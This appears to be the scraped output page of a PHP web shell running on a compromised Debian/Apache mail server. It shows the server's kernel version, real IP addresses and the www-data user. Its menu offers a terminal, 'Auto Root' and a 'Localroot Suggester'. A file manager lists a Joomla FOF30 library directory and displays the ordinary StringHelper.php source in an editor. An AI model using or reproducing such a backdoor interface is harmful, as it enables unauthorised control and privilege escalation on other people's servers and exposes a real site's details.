Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
libraries /
fof30 /
Utils /
Delete
Unzip
Name
Size
Permission
Date
Action
FEFHelper
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
InstallScript
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
ArrayHelper.php
12.7
KB
-rwxr-xr-x
2021-02-05 16:00
Buffer.php
6.44
KB
-rwxr-xr-x
2021-02-05 16:00
CacheCleaner.php
5.96
KB
-rwxr-xr-x
2021-02-05 16:00
CliSessionHandler.php
3.19
KB
-rwxr-xr-x
2021-02-05 16:00
Collection.php
13.32
KB
-rwxr-xr-x
2021-02-05 16:00
ComponentVersion.php
3.33
KB
-rwxr-xr-x
2021-02-05 16:00
DynamicGroups.php
5.78
KB
-rwxr-xr-x
2021-02-05 16:00
FilesCheck.php
7.27
KB
-rwxr-xr-x
2021-02-05 16:00
InstallScript.php
752
B
-rwxr-xr-x
2021-02-05 16:00
Ip.php
13.69
KB
-rwxr-xr-x
2021-02-05 16:00
MediaVersion.php
4.83
KB
-rwxr-xr-x
2021-02-05 16:00
ModelTypeHints.php
6.08
KB
-rwxr-xr-x
2021-02-05 16:00
Phpfunc.php
788
B
-rwxr-xr-x
2021-02-05 16:00
SelectOptions.php
10.47
KB
-rwxr-xr-x
2021-02-05 16:00
StringHelper.php
2.05
KB
-rwxr-xr-x
2021-02-05 16:00
TimezoneWrangler.php
9.57
KB
-rwxr-xr-x
2021-02-05 16:00
helpers.php
10.15
KB
-rwxr-xr-x
2021-02-05 16:00
Save
Rename
<?php /** * @package FOF * @copyright Copyright (c)2010-2021 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU General Public License version 2, or later */ namespace FOF30\Utils; defined('_JEXEC') || die; use JLoader; use Joomla\CMS\Application\ApplicationHelper; use Joomla\CMS\Factory; use Joomla\CMS\Log\Log; abstract class StringHelper { /** * Convert a string into a slug (alias), suitable for use in URLs. Please * note that transliteration support is rudimentary at this stage. * * @param string $value A string to convert to slug * * @return string The slug * * @deprecated 3.0 Use \JApplicationHelper::stringURLSafe instead * * @codeCoverageIgnore */ public static function toSlug($value) { if (class_exists('\JLog')) { Log::add('FOF30\\Utils\\StringHelper::toSlug is deprecated. Use \\JApplicationHelper::stringURLSafe instead', Log::WARNING, 'deprecated'); } return ApplicationHelper::stringURLSafe($value); } /** * Convert common northern European languages' letters into plain ASCII. This * is a rudimentary transliteration. * * @param string $value The value to convert to ASCII * * @return string The converted string * * @deprecated 3.0 Use JFactory::getLanguage()->transliterate instead * * @codeCoverageIgnore */ public static function toASCII($value) { if (class_exists('\JLog')) { Log::add('FOF30\\Utils\\StringHelper::toASCII is deprecated. Use JFactory::getLanguage()->transliterate instead', Log::WARNING, 'deprecated'); } $lang = Factory::getLanguage(); return $lang->transliterate($value); } /** * Convert a string to a boolean. * * @param string $string The string. * * @return boolean The converted string */ public static function toBool($string) { $string = trim((string) $string); $string = strtolower($string); if (in_array($string, [1, 'true', 'yes', 'on', 'enabled'], true)) { return true; } if (in_array($string, [0, 'false', 'no', 'off', 'disabled'], true)) { return false; } return (bool) $string; } }